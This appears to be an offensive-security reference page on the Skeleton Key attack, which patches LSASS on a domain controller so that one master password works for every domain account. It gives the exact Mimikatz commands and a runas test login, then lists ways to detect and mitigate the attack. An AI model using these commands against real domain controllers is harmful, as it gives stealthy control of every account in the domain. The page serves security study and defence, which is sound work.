Skeleton Key
Skeleton Key
A Skeleton Key is a stealthy backdoor attack where Mimikatz injects a patch into LSASS memory on a Domain Controller. This allows an attacker to authenticate as any domain user using a master password, in addition to their real credentials.
Overview
- Injects code into `lsass.exe` on a Domain Controller
- Leaves legitimate logins untouched
- Adds a universal password valid for all domain accounts
- Memory-resident: disappears on reboot
Prerequisites
- SYSTEM-level access on a Domain Controller
- Ability to execute code and patch LSASS memory
- Mimikatz or similar tool
Key Concepts
- LSASS: Local Security Authority Subsystem Service; handles authentication
- Patch: Modifies Kerberos/NTLM authentication providers in memory
- Backdoor password: An additional universal password accepted for all users
Mimikatz Commands
Load Skeleton Key Patch
mimikatz # privilege::debug
mimikatz # misc::skeleton
Default password: mimikatz
Once injected, any domain user can authenticate with either:
- Their real password
- The skeleton key password: `mimikatz`
Test Authentication
From any domain-joined machine:
runas /user:corp.local\jdoe cmd
# Enter password: mimikatz
A shell should open, authenticating as `jdoe`.
Limitations
- Only works with NTLM and Kerberos TGTs issued by the patched DC
- Only works while the DC is running (cleared on reboot)
- Does not persist unless reloaded or installed via persistent malware
Impact
- Full domain compromise
- Extremely stealthy – no password changes, no account creation
- Invisible to domain logs unless memory or behavior is being monitored
Detection
- Monitor LSASS for code injection or unsigned module loads
- Behavioral indicators:
- Unusual NTLM/Kerberos logons without known credentials
- Multiple users authenticating with the same password
- Defender for Identity, EDRs like CrowdStrike, Sysmon for `lsass.exe` memory anomalies
Mitigation
- Reboot the DC (clears the patch)
- Use Protected Process Light (PPL) for LSASS (Windows Defender Credential Guard)
- Monitor with EDR
- Block admin rights to DCs and restrict RDP access
- Isolate and rebuild compromised DCs